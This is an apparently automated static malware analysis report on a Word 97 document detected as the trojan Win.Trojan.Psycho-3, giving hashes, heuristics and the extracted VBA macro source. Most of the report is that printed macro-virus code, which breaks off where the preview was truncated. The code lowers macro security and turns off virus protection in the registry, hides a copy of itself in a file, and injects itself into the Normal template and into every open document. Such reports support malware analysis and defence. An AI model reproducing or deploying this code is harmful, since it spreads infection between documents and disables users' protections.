Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2cffadb3ad14f82f…

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-11-14 18:10:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 108f40fb92a1ba38b80ec3e4a3e1f650 SHA-1: 832bad8baee1289d8914efe7168caace63ca0e65 SHA-256: 2cffadb3ad14f82fbcc8c26eec0cef1091e87a8330fca3378422a93d8b026e7b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code within Office documents. The script attempts to lower macro security settings and remove itself upon document closure, indicating an effort to evade detection. The ClamAV detections suggest it is a known trojan.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29645 bytes
SHA-256: 63464db4458724cac3ff9ccef942366f37af9a5a1cc44a3f64d835046b964b3d
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Application.EnableCancelKey = Not -1
CountofDocs = Documents.Count
For Doc = 0 To CountofDocs
If Documents.Item(Doc).VBProject.VBComponents.Item(1).Name <> "ThisDoc" Then
Set t = Documents.Item(Doc).VBProject.VBComponents.Item(1)

s = Documents.Item(Doc).Saved

begin = 1
If t.CodeModule.Find("Document_Open()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
ElseIf t.CodeModule.Find("Document_Close()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ToolsMacro()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Filetemplates()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ViewVBCode()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
End If
End If
End If
End If

Open "c:\hawk.___" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
t.Name = "ThisDoc"
If Left(Documents.Item(Doc).Name, 8) <> "Document" Then Documents.Item(Doc).SaveAs FileName:=ActiveDocument.FullName
If Documents.Item(Doc).Saved <> s Then Documents.Item(Doc).Saved = s
End If
Next Doc

SetAttr "c:\hawk.___", 0
Kill "c:\hawk.___"
End Sub

Private Sub Document_Open()

On Error Resume Next

Randomize

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

If Dir("c:\hawk.___", 6) = "" Then
Open "c:\hawk.___" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\hawk.___", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "ThisDoc" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

begin = 1
If t.CodeModule.Find("Document_Open()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Document_Close()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ToolsMacro()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Filetemplates()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeMo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.